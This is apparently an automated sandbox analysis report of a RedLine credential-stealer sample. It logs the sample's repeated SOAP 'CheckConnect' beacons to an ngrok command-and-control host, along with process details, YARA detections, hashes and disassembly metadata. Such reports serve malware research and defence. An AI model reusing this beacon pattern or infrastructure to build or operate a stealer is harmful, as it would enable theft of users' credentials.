                                  Feb 17, 2024 20:43:01.066286087 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  17192.168.2.4497523.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:01.615818977 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  18192.168.2.4497533.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:08.468148947 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  19192.168.2.4497543.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:13.756833076 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  20192.168.2.4497553.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:19.329188108 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  21192.168.2.4497563.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:19.891447067 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  22192.168.2.4497573.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:25.459287882 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  23192.168.2.4497583.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:26.007471085 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  24192.168.2.4497593.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:31.574500084 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  25192.168.2.4497603.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:32.126351118 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  26192.168.2.4497613.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:37.681013107 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  27192.168.2.4497623.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:38.236052036 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  28192.168.2.4497633.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:43.802356005 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  29192.168.2.4497643.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:49.366439104 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  30192.168.2.4497653.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:49.917583942 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  31192.168.2.4497663.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:55.475730896 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  32192.168.2.4497673.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:56.023765087 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  33192.168.2.4497683.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:44:01.583507061 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:20:41:59
                                  Start date:17/02/2024
                                  Path:C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  Imagebase:0x860000
                                  File size:97'792 bytes
                                  MD5 hash:117EEF8A227E6CE3646718D0ED6FB7B1
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:false

                                  General

                                  Target ID:1
                                  Start time:20:41:59
                                  Start date:17/02/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:12.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:16
                                    Total number of Limit Nodes:0
                                    execution_graph 12572 f90871 12576 f908d8 12572->12576 12581 f908c8 12572->12581 12573 f90889 12577 f908fa 12576->12577 12586 f90ce8 12577->12586 12590 f90ce0 12577->12590 12580 f9093e 12580->12573 12582 f908fa 12581->12582 12584 f90ce8 GetConsoleWindow 12582->12584 12585 f90ce0 GetConsoleWindow 12582->12585 12583 f9093e 12583->12573 12584->12583 12585->12583 12587 f90d26 GetConsoleWindow 12586->12587 12589 f90d56 12587->12589 12589->12580 12591 f90d26 GetConsoleWindow 12590->12591 12593 f90d56 12591->12593 12593->12580

                                    Executed Functions

                                    Function 00F9E7B0 Relevance: .9, Instructions: 927COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1036 f9e7b0-f9e7d1 1038 f9e7d3-f9e7d9 1036->1038 1039 f9e815-f9e81c 1036->1039 1040 f9e9ab-f9ea04 1038->1040 1041 f9e7df-f9e7f9 1038->1041 1046 f9ea0d-f9ea18 1040->1046 1047 f9ea06-f9ea08 1040->1047 1048 f9e7fb-f9e80a 1041->1048 1049 f9e81d-f9e82c 1041->1049 1054 f9f339-f9f3e9 1046->1054 1055 f9ea1e-f9ea2f 1046->1055 1050 f9f32f-f9f336 1047->1050 1056 f9e810-f9e813 1048->1056 1057 f9e8f5-f9e8fe 1048->1057 1049->1056 1058 f9e82e-f9e83d 1049->1058 1123 f9f3f0-f9f4ae 1054->1123 1066 f9ea31-f9ea40 1055->1066 1067 f9ea42 1055->1067 1056->1038 1056->1039 1059 f9e908-f9e9a4 1057->1059 1060 f9e900-f9e906 1057->1060 1058->1056 1068 f9e83f-f9e848 1058->1068 1059->1040 1060->1059 1072 f9ea44-f9ea75 1066->1072 1067->1072 1069 f9e84a-f9e850 1068->1069 1070 f9e852-f9e8ee 1068->1070 1069->1070 1070->1057 1083 f9ea93-f9eabe 1072->1083 1084 f9ea77-f9ea8b call f9d8f8 1072->1084 1092 f9eadc-f9eafe 1083->1092 1093 f9eac0-f9ead4 call f9d8f8 1083->1093 1084->1083 1106 f9ed55-f9ed5f 1092->1106 1107 f9eb04-f9eb2a 1092->1107 1093->1092 1110 f9ed7d-f9edfa 1106->1110 1111 f9ed61-f9ed75 call f9d8f8 1106->1111 1127 f9eb30-f9eb3d 1107->1127 1128 f9ed43-f9ed4f 1107->1128 1160 f9ee0d-f9ee72 call f9cd58 1110->1160 1161 f9edfc-f9ee05 1110->1161 1111->1110 1151 f9f4b5-f9f56c 1123->1151 1127->1123 1138 f9eb43-f9eb47 1127->1138 1128->1106 1128->1107 1140 f9eb49-f9eb55 1138->1140 1141 f9eb5b-f9eb61 1138->1141 1140->1141 1140->1151 1144 f9eb63-f9eb6f 1141->1144 1145 f9eb75-f9ebc0 1141->1145 1144->1145 1152 f9f573-f9f62a 1144->1152 1171 f9ec39-f9ec3d 1145->1171 1172 f9ebc2-f9ebe4 1145->1172 1151->1152 1209 f9f631-f9f7db 1152->1209 1202 f9ee84-f9ee90 1160->1202 1203 f9ee74-f9ee7e 1160->1203 1161->1160 1173 f9ec3f-f9ec61 1171->1173 1174 f9ecb6-f9ecee 1171->1174 1195 f9ec0d-f9ec2a 1172->1195 1196 f9ebe6-f9ec0b 1172->1196 1204 f9ec8a-f9eca7 1173->1204 1205 f9ec63-f9ec88 1173->1205 1231 f9ecf0-f9ed15 1174->1231 1232 f9ed17-f9ed34 1174->1232 1238 f9ec32-f9ec34 1195->1238 1196->1238 1210 f9ef51-f9ef76 call f9cd58 1202->1210 1211 f9ee96-f9ee9f 1202->1211 1203->1202 1203->1209 1244 f9ecaf-f9ecb1 1204->1244 1205->1244 1216 f9f7e2-f9f80c call f9cc20 1209->1216 1253 f9ef7e-f9ef9a 1210->1253 1211->1216 1217 f9eea5-f9eeab 1211->1217 1255 f9f80e-f9f810 1216->1255 1256 f9f811-f9f820 1216->1256 1223 f9eead-f9eeb3 1217->1223 1224 f9eec3-f9eef6 1217->1224 1229 f9eeb5 1223->1229 1230 f9eeb7-f9eec1 1223->1230 1246 f9eef8-f9ef0c call f9d8f8 1224->1246 1247 f9ef14-f9ef4b 1224->1247 1229->1224 1230->1224 1273 f9ed3c-f9ed3e 1231->1273 1232->1273 1238->1050 1244->1050 1246->1247 1247->1210 1247->1211 1276 f9ef9c-f9efc2 1253->1276 1277 f9efc4-f9efe0 1253->1277 1271 f9f82d-f9f831 1256->1271 1272 f9f822-f9f82c 1256->1272 1273->1050 1276->1277 1282 f9efee 1277->1282 1283 f9efe2 1277->1283 1282->1050 1283->1282
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2945720828.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f90000_kuEfaZxkiY.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5a34045b10357486b77e8122061f21b6364bf195793d241e51ec78ba2e713b85
                                    • Instruction ID: 1600c15ea2e7c60ca5d01d2e95b6ed81fd9e9a15cc3aa863651fae39670fb33c
                                    • Opcode Fuzzy Hash: 5a34045b10357486b77e8122061f21b6364bf195793d241e51ec78ba2e713b85
                                    • Instruction Fuzzy Hash: 7482E834B002588FDB14DF68D899B6DBBB2BF88310F1184A9E50A9B3A5DF309D85DF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00F90CE0 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 903 f90ce0-f90d54 GetConsoleWindow 906 f90d5d-f90d82 903->906 907 f90d56-f90d5c 903->907 907->906
                                    APIs
                                    • GetConsoleWindow.KERNELBASE ref: 00F90D47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2945720828.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f90000_kuEfaZxkiY.jbxd
                                    Similarity
                                    • API ID: ConsoleWindow
                                    • String ID:
                                    • API String ID: 2863861424-0
                                    • Opcode ID: 002d8aa482b39637895e7609670617d9e7ec69545f1a3e85a30dadceca6a1f4e
                                    • Instruction ID: ce0d615bad46c29791f4a83904ecf792ec2048a6747fdf7177c2aa2d4ae52873
                                    • Opcode Fuzzy Hash: 002d8aa482b39637895e7609670617d9e7ec69545f1a3e85a30dadceca6a1f4e
                                    • Instruction Fuzzy Hash: 881136B1D002498FDB20DFAAC8457DEFFF0AF88324F24842AC459A7250CB79A544CF94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00F90CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 911 f90ce8-f90d54 GetConsoleWindow 914 f90d5d-f90d82 911->914 915 f90d56-f90d5c 911->915 915->914
                                    APIs
                                    • GetConsoleWindow.KERNELBASE ref: 00F90D47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2945720828.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f90000_kuEfaZxkiY.jbxd
                                    Similarity
                                    • API ID: ConsoleWindow
                                    • String ID:
                                    • API String ID: 2863861424-0
                                    • Opcode ID: f95dbff4e3215810e06dea6752744fe312ea29eb7891e8596dac3be918563507
                                    • Instruction ID: 30fe0e0657e7e3df8f8c58171675d337b3d58dfa79ae42123873937257e3a8d8
                                    • Opcode Fuzzy Hash: f95dbff4e3215810e06dea6752744fe312ea29eb7891e8596dac3be918563507
                                    • Instruction Fuzzy Hash: D21103B1D002498FDB20DFAAC4457DEFFF4AB88324F20842AC459A7250CB79A944CFA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 00F9DC90 Relevance: 1.6, Strings: 1, Instructions: 369COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2945720828.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f90000_kuEfaZxkiY.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Hbq
                                    • API String ID: 0-1245868
                                    • Opcode ID: 864c6d63a9aa21eb6b42f562e1316d31700dc84ea8761dc8077e0d0edf50bd01
                                    • Instruction ID: da5d14ec0e131bcf1ea59363c574c841b8fa3a816dddea065554fadc101ac4d4
                                    • Opcode Fuzzy Hash: 864c6d63a9aa21eb6b42f562e1316d31700dc84ea8761dc8077e0d0edf50bd01
                                    • Instruction Fuzzy Hash: E7D15B34B002458FDB14EB79D898A6EBBF6EF89350B148469E905DB3A5DF70DC02CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%